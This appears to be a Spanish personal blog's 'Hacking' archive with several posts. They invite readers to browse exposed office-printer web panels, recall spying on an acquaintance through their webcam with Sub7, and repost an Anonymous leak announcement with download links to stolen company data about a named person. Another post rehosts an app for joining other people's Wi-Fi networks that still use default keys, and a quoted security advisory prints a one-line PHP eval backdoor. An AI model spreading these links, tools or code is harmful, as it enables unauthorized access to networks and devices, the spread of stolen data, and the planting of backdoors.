Archive for the ‘Hacking’ Category

De paseo por las Web Image Monitor abiertas y publicadas en internet

Uno de los blogs que visito casi a diario y que me encanta leer es este: Un informatico en el lado del mal, de Chema Alonso. Ayer pasaba por alli y tenia publicada una entrada que me llamo mucho la atencion, trata sobre las impresoras en red que tienen el acceso web para fisgar sin ningun tipo de prohibicion y ademas, con una simple busqueda, aparece indexadas en Google. Esto es un fallo de seguridad muy grave, pues podemos ver que documentos se han impresora, a que numeros de fax se envian documentos y de que numeros se reciben, usuarios usados para la impresion, etc. Basicamente, por lo que pude estar “mirando”, se trata de impresoras de red de entes educativos, universidades basicamente.

Me recordo mi epoca “juanker”, antes, hace unos años en mis tiempos mozos, tenia tiempo para rebuscar y ver como podia entrar a mirar “cosas” en “sitios”, perdiendo (en realidad no es tiempo perdido pues todos los fallos que yo usaba, ahora los corrigo en mi propio servidor y en mi trabajo) tiempo en conocer que albergaba ese rango de IP’s, usando port scaners y pequeños programas para “darme acceso”. Recuedo muy bien el dia que usando Sub7 y el Calimotxo, entre en el equipo de un “contacto” de Messenger, active su Webcam y vi la cara de mi “victima” frente a su monitor, creo que jamas olvidare esos minutos de poder que tenia entre mis manos. Al final se lo dije, y le enseñe como hacerlo a el tambien, quedo en una anecdota y en “eres un cabron”.

A lo que voy, si quereis pasar un rato mirando la configuracion de impresoras de Canada o de China, poneis en Google estas rutas y sereis como un enviado de la ONU a la guerra, un observador internacional:

Web Image Monitor de Ricoh

Un comentario en la entrada de Chema Alonso que me ha llamado la atencion:

Un saludo.
Me ha interesado mucho tu artículo, ya que soy técnico de Ricoh. Pero tampoco es para asustarse, ya que Google, sólo ha encontrado 260 resultados, teniendo en cuenta que sólo en España, puede haber más de 1 millón de máquinas Ricoh, tirando bajo, y los resultados son a nivel mundial. He intentado acceder a algunas máquinas, y no he podido, se ve que por lo menos cambian la contraseña de fábrica. Aunque es cierto, que sin logearse, accedes a informes de fax y cola de impresión. Lo del robots.txt tendría que ser a nivel de programación de la máquina ¿no? Ricoh el software interno que usa es Unix. Teniendo en cuenta que las máquinas Ricoh, la mayoría tienen acceso a internet, por un tema de comunicación con servidores japoneses, me ha extrañado que sean muy pocos resultados, ¿puede ser también problema de configuración de las redes donde están instaladas estas máquinas? Gracias por tus artículos.

Y mientras en un oscuro agujero…

Esta impresora es de esta empresa de estos señores – > http://pview.findlaw.com/view/1896426_1

Y si quieres un mapa de donde esta, tambien lo tengo:


Ver mapa más grande
Otra que lleva el user y el pass de fabrica…

Comparte:

    EN SOLIDARIDAD CON LOS MINEROS ESPAÑOLES – 145MB FILTRADOS DE LA PATRONAL DEL CARBÓN

    1.   *** CARBUNION ***                                      www.carbunion.com
    2.    _____         __             _             ____ _      ___  ______ ___
    3.   / ___/__ _____/ /  __ _____  (_)__  ___    / __ \ | /| / / |/ /_  // _ \
    4.  / /__/ _ `/ __/ _ \/ // / _ \/ / _ \/ _ \  / /_/ / |/ |/ /    //_ </ // /
    5.  \___/\_,_/_/ /_.__/\_,_/_//_/_/\___/_//_/  \____/|__/|__/_/|_/____/____/   BY
    6.                                                                                                          ____
    7.       db    88b 88  dP”Yb  88b 88 Yb  dP 8b    d8  dP”Yb  88   88 .dP”Y8                88        db    dP””Yb
    8.      dPYb   88Yb88 dP   Yb 88Yb88  YbdP  88b  d88 dP   Yb 88   88 `Ybo.”     ______     88       dPYb   Ybood8
    9.     dP__Yb  88 Y88 Yb   dP 88 Y88   8P   88YbdP88 Yb   dP Y8   8P o.`Y8b     “”””””     88  .o  dP__Yb    .8P’
    10.    dP””””Yb 88  Y8  YbodP  88  Y8  dP    88 YY 88  YbodP  `YbodP’ 8bodP’                88ood8 dP””””Yb  .dP’
    11.    EN SOLIDARIDAD CON LOS MINEROS ESPAÑOLES …………………… 145MB FILTRADOS DE LA PATRONAL DEL CARBÓN
    12. 01000001 01101110 01101111 01101110 01111001 01101101 01101111 01110101 01110011  00101101  01001100 01100001 00111001
    13. Junio de 2012. Ciudadanos del mundo, La 9 de Anonymous os saluda.
    14. A estas alturas de la historia deberiamos movernos en coches eléctricos voladores, haber solucionado el hambre en el mundo y erradicado alguna de esas “enfermedades milenarias”… pero no, seguimos estancados en los mismos paradigmas, en las misma farsa.
    15. LA ESTAFA financiera en nuestro país y fuera de sus fronteras ha ido teniendo repercusiones cada vez más graves. Las malas noticias van engrosando los medios y las protestas crecen exponencialmente en nuestras calles. La última lucha es la que han abierto los mineros, que sufren uno de los sectores más castigados por la corrupción política y empresarial.
    16. Mineros de diversas regiones de España, como León, Asturias o Aragón, que han comenzado una huelga indefinida junto con numerosas protestas que no tienen por lo pronto intención de abandonar.
    17. Esta lucha que se está librando día a día en nuestras calles está siendo silenciada, llegando a la situación de tener que acudir a fuentes extranjeras para saber qué ocurre. Esa es la lucha de los trabajadores, la de aquellos ciudadanos que pelean día a día por poder llevar pan a su casa.
    18. Esta protesta ha recibido un gran apoyo por parte de la gente de a pie, pero también ha sido el blanco de diversas críticas: políticos que intentan frenar los distintos focos de resistencia declarando falazmente que no es momento de protestar, empresarios que intentan dividir a la gente entre “mano de obra” y “público”, “mineros” y “verdes”, “poderosos” o “esclavos”…
    19. Pero han olvidado que hemos redescubierto un horizonte común de libertad y dignidad… PARA TODOS.
    20. No estamos ante un debate sobre los beneficios e inconvenientes del carbón, estamos ante una lucha por la soberanía y el futuro de cada ciudadano: basta de corrupción, mentiras y manipulación.
    21. ¿Qué ha pasado con las cifras astronómicas otorgadas para el sector y su reconversión?
    22. ¿Quienes y cómo las han gestionado y/o se las han repartido?
    23. ¿Donde están las ALTERNATIVAS para los mineros, ahora que su futuro se tambalea?
    24. Lo que exigimos son SOLUCIONES REALES para el futuro de los mineros, sus familias y los trabajadores en general, convertidos hoy en un objeto de usar y tirar para las clases dirigentes.
    25. Y ya conocéis nuestra postura, siempre clara: la información es libre.
    26. Por eso estamos hoy aquí… ¡Hágase la lulz!
    27. Puedes descargar la filtración de Carbunion (140MB de datos confidenciales de la patronal del carbón) y de paso informarte de la parte que los medios nunca cuentan.
    28. Que todo el mundo sepa de qué tipo de chanchullos y mafiosos hablamos.
    29. Se acabó la impunidad: España ya no es lugar para los malvados.
    30. ¡Corred insensatos!
    31. Vamos a perseguiros porque queremos, porque podemos y porque nos divierte.
    32. Somos legión.
    33. No olvidamos.
    34. No perdonamos.
    35. Y deberíais habernos esperado.
    36.  C | a | r | b | u | n | i | o | n     O | W | N | E | D
    37. Filtración de CARBUNION (145MB):
    38. www.nowdownload.eu/dl/65hj1mn2xvta4
    39. (MIRRORS)
    40. http://www.multiupload.nl/I8JVNVAKI0
    41. http://depositfiles.com/files/gji3bekrv
    42. http://www.speedyshare.com/spDpC/44fb5b1de494b-carbunion.zip
    43. @Carbunion
    44. ¿Quién es Victorino Alonso?:
    45.     Victorino Alonso: ERE a 600 trabajadores (2010): https://www.youtube.com/watch?v=psCpWBp0g7E
    46.     El Supremo condena a Victorino Alonso a pagar 14 M€ a Unión Fenosa (2010): http://www.elmundo.es/elmundo/2010/03/21/castillayleon/1269165181.html http://www.ideal.es/granada/v/20101003/sociedad/victorino-alonso-patron-negro-20101003.html
    47.     ¿A quién teme Victorino Alonso?  http://perspectivadelocio.blogspot.com/2010/09/quien-teme-victorino-alonso.html
    48.     Victorino Alonso, el rey del carbón (2010): http://www.periodistadigital.com/economia/empresas/2010/09/18/-victorino-alonso-el-rey-del-carbon-.shtml
    49.     Los empresarios de la minería de carbón: Victorino Alonso (alias “Don Vito”) y Manuel Lamelas Viloria, han recibido 367 millones de euros en ayudas públicas este año, pero en cambio no pagan las nóminas a los mineros. Según dice hasta el Ministro de  Industria Sebastián: “No pueden justificar que no tienen dinero, tocan a 141.000 euros por cada uno de los 2.600 mineros que emplean”: http://www.davidhammerstein.com/article-preguntas-sobre-victorino-alonso-y-su-protesta-minera-57158327.html
    50.     Victorino Alonso anuncia una bajada del 70% en el sueldo de los mineros “La patronal no aplicará «ni despidos ni ERE», pero reducirá los salarios en la proporción en la que caen las ayudas” (2012): http://www.lne.es/cuencas/2012/05/11/victorino-alonso-anuncia-bajada-70-sueldo-mineros/1240181.html
    51.     Victorino Alonso avisa que los recortes a la minería del carbón condenan al sector al cierre (2012): http://www.energiadiario.com/publicacion/spip.php?article20622
    52.     Victorino Alonso afirma que las minas cerrarán este mes por la falta de ayudas. El presidente de la patronal Carbunión denuncia el «abuso total de poder» del Gobierno, «propio de una dictadura», al incumplir el plan del carbón (2012): http://www.lne.es/cuencas/2012/05/19/victorino-alonso-afirma-minas-cerraran-mes-falta-ayudas/1244124.html
    53.     Victorino Alonso, el patrón del oro negro. Mueve el 30% del carbón nacional y se cura el estrés  paseando en calcetines por sus minas. Denunciado por su ex mujer por no  pagar la pensión de sus hijas, se declaró insolvente  (2010): http://www.ideal.es/granada/v/20101003/sociedad/victorino-alonso-patron-negro-20101003.html
    54.     Victorino Alonso, lapidario: “Muerto el perro se acabó la rabia” El empresario anuncia el fin de la minería si el Gobierno mantiene los  impagos, traslada a los trabajadores la situación límite y anuncia  economía de guerra (2012): http://leonoticias.com/frontend/leonoticias/Victorino-Alonso-Lapidario–Muerto-El-Perro-Se-Acabo-La-Ra-vn98125-vst445
    55.     Wanted: Victorino Alonso http://apudepa.blogia.com/2012/030601-wanted-victorino-alonso.php
    56.     Cuando el Padrino se enfada http://altosil.blogspot.com/2012/02/cuando-el-padrino-se-enfada.html

    Fuente: http://www.pastebay.net/1063239

    Comparte:

      Reglas para una contraseña robusta e imposible de hackear

      ¿Quieres tener una contraseña imposible de hackear? Sigue las pautas de creacion de contraseñas seguras que me pasaron por correo (son reales), a ver si eres capaz de que no te explote el cerebro pensando en la clave que pondras. Por cierto, luego no vale escribirla en un post-it y pegarla en el monitor para que no se te olvide, te la tienes que aprender de memoria, y una diferente para cada servicio que requiera de autentificacion.

      1.- No contener el nombre de cuenta del usuario o partes del nombre completo del usuario en más de dos caracteres consecutivos

      2.- Tener una longitud mínima de ocho caracteres

      3.-  No repetir las últimas 18 contraseñas utilizadas

      4.- Incluir caracteres de al menos tres de las siguientes categorías:
      Mayúsculas (de la ‘A’ a la ‘Z’)
      Minúsculas (de la ‘a’ a la ‘z’)
      Dígitos de base 10 (del 0 al 9)
      Caracteres no alfanuméricos (por ejemplo, !, $, #, %)

      Comparte:

        Descarga PulWifi para Android


        Recordareis que hace casi un año, se desvelo/publico el algoritmo que generaba de forma automatica las claves de las redes Wifi de Telefonica y Jazztel, las famosas WLAN_XXX, por lo que sabiendo el camino, a los pocos dias comenzaron a aparecer como las setas aplicaciones web, formularios y demas herramientas para averiguar la clave wifi de esas redes y hacer uso de ellas sin ningun problema, siempre y cuando la clave fuera la original que trae el router. Bien, pues ha pasado algun tiempo y el tema se enfrio bastante, llegando a decirse que Telefonica iba a cambiar todos los routers, bla, bla, bla, hasta yo me habia olvidado del tema completamente, hasta hace unos dias.

        Mi colega de trabajo me paso esta aplicacion, que ya no esta en el Market de Android, se llama PulWifi, y sirve para conectarse “by the face” a las redes citadas anteriormente sin hacer absolutamente nada.

        El funcionamiento es sencillo, se instala en el movil o tableta, se ejecuta y automaticamente se pone a escanear redes WIFI, en cuanto detecta una red del tipo WLAN_xxx y la clave no ha sido modificada, es decir, se puede aplicar el algoritmo descubierto pero a la inversa, te pone el candado abierto y en verde, simplemente tienes que tocar en la red y estaras conectado a ella, sin mas.

        Como no esta disponible en el Market, yo voy a subir a mi servidor el instalador por si tambien desaparece semejante herramienta de la faz de internet.

        Descarga pulWifi_127_signed (fichero comprimido en *.zip)

        Comparte:

          script ‘C:/AppServ/www/phpMyAdmin/upgrade.php’ encontrado en error.log

          No paro de encontrar cosas curiosas examinando mi error.log del blog, la penultima es esta linea:

          script ‘C:/AppServ/www/phpMyAdmin/upgrade.php’

          Ejecutada por tres diferentes ip’s en menos de 2 minutos, quiza sea un intento fallido de denegacion de servicio, me estan hackeando el blog, uuuhhhhh… que miedo. Pues nada mas lejos de la realidad, por supuesto, realizo la pertinente busqueda de la cadena completa en Google y me encuentro con esto: (fuente)

          If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

          On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

          <?php if(isset($_REQUEST[“asc”]))eval(stripslashes($_REQUEST[“asc”])); ?>

          This is not part of the plugin, and should be removed immediately!

          The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

          We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

          EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

          The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

          So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.


          If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

          If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.

           

          Por suerte no estoy usando el plugin para WordPress que “ofrece” este bug, nunca esta de mas saber estas cosas. Ya sabeis, si estais usando el plugin WP-phpmyadmin, desinstalarlo, u os pueden marear un poco el blog.

          Comparte: